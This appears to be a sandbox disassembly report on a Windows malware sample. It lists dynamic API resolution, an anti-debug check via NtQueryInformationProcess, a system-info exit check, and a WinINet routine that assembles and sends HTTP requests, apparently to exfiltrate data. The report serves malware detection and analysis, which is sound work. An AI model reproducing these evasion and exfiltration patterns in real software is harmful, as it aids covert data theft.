                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                        • strlen.MSVCRT ref: 004046F0
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 2127927946-2218711628
                        • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                        • Instruction ID: 5e1cd967cc1bd71f365b3ff5871be6e8d111942329c8327febd6a33c3aeace51
                        • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                        • Instruction Fuzzy Hash: 5841BD79740624EBC718AFE5EC8DB987F70AB4C712BA0C062F90296190C7F9D5019B3D

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 663 419860-419874 call 419750 666 419a93-419af2 LoadLibraryA * 5 663->666 667 41987a-419a8e call 419780 GetProcAddress * 21 663->667 668 419af4-419b08 GetProcAddress 666->668 669 419b0d-419b14 666->669 667->666 668->669 672 419b46-419b4d 669->672 673 419b16-419b41 GetProcAddress * 2 669->673 674 419b68-419b6f 672->674 675 419b4f-419b63 GetProcAddress 672->675 673->672 676 419b71-419b84 GetProcAddress 674->676 677 419b89-419b90 674->677 675->674 676->677 678 419bc1-419bc2 677->678 679 419b92-419bbc GetProcAddress * 2 677->679 679->678
                        APIs
                        • GetProcAddress.KERNEL32(75900000,024ACCA8), ref: 004198A1
                        • GetProcAddress.KERNEL32(75900000,024ACD08), ref: 004198BA
                        • GetProcAddress.KERNEL32(75900000,024ACD20), ref: 004198D2
                        • GetProcAddress.KERNEL32(75900000,024ACC90), ref: 004198EA
                        • GetProcAddress.KERNEL32(75900000,024D9690), ref: 00419903
                        • GetProcAddress.KERNEL32(75900000,024A5C50), ref: 0041991B
                        • GetProcAddress.KERNEL32(75900000,024A4510), ref: 00419933
                        • GetProcAddress.KERNEL32(75900000,024A42F0), ref: 0041994C
                        • GetProcAddress.KERNEL32(75900000,024D9648), ref: 00419964
                        • GetProcAddress.KERNEL32(75900000,024D9618), ref: 0041997C
                        • GetProcAddress.KERNEL32(75900000,024D9810), ref: 00419995
                        • GetProcAddress.KERNEL32(75900000,024D9768), ref: 004199AD
                        • GetProcAddress.KERNEL32(75900000,024A42D0), ref: 004199C5
                        • GetProcAddress.KERNEL32(75900000,024D9720), ref: 004199DE
                        • GetProcAddress.KERNEL32(75900000,024D97C8), ref: 004199F6
                        • GetProcAddress.KERNEL32(75900000,024A4410), ref: 00419A0E
                        • GetProcAddress.KERNEL32(75900000,024D9828), ref: 00419A27
                        • GetProcAddress.KERNEL32(75900000,024D9840), ref: 00419A3F
                        • GetProcAddress.KERNEL32(75900000,024A4310), ref: 00419A57
                        • GetProcAddress.KERNEL32(75900000,024D9600), ref: 00419A70
                        • GetProcAddress.KERNEL32(75900000,024A4390), ref: 00419A88
                        • LoadLibraryA.KERNEL32(024D97E0,?,00416A00), ref: 00419A9A
                        • LoadLibraryA.KERNEL32(024D98A0,?,00416A00), ref: 00419AAB
                        • LoadLibraryA.KERNEL32(024D9678,?,00416A00), ref: 00419ABD
                        • LoadLibraryA.KERNEL32(024D9858,?,00416A00), ref: 00419ACF
                        • LoadLibraryA.KERNEL32(024D97F8,?,00416A00), ref: 00419AE0
                        • GetProcAddress.KERNEL32(75070000,024D9780), ref: 00419B02
                        • GetProcAddress.KERNEL32(75FD0000,024D9798), ref: 00419B23
                        • GetProcAddress.KERNEL32(75FD0000,024D9630), ref: 00419B3B
                        • GetProcAddress.KERNEL32(75A50000,024D9870), ref: 00419B5D
                        • GetProcAddress.KERNEL32(74E50000,024A4430), ref: 00419B7E
                        • GetProcAddress.KERNEL32(76E80000,024A5C70), ref: 00419B9F
                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 00419BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                        • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                        • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                        • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 767 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 782 404944 767->782 783 40494b-40494f 767->783 782->783 784 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 783->784 785 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 783->785 784->785 871 404ad3-404ad7 784->871 795 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 785->795 796 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 785->796 796->795 872 404ae5 871->872 873 404ad9-404ae3 871->873 874 404aef-404b22 HttpOpenRequestA 872->874 873->874 875 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 874->875 876 404ebe-404ec5 InternetCloseHandle 874->876 987 404e32-404e5c InternetReadFile 875->987 876->785 988 404e67-404eb9 InternetCloseHandle call 41a800 987->988 989 404e5e-404e65 987->989 988->876 989->988 990 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 989->990 990->987
                        APIs
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                        • StrCmpCA.SHLWAPI(?,024D9A00), ref: 0040493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                        • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,024DE470), ref: 00404DE8
                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                        • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                        • HttpOpenRequestA.WININET(00000000,024DE3B0,?,024DDF00,00000000,00000000,00400100,00000000), ref: 00404B15
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 2402878923-2180234286
                        • Opcode ID: 14af7d5969852ec007fdeec1facad88a693abf9282d8eb6001c30f70f80f375e
                        • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                        • Opcode Fuzzy Hash: 14af7d5969852ec007fdeec1facad88a693abf9282d8eb6001c30f70f80f375e
                        • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                        • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocNameProcessUser
                        • String ID:
                        • API String ID: 1206570057-0
                        • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                        • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                        • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                        • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                        APIs
                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                        • ExitProcess.KERNEL32 ref: 0040117E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                        • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                        • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                        • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                        Control-flow Graph

                        APIs
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                          • Part of subcall function 004045C0: GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                          • Part of subcall function 004045C0: RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                          • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
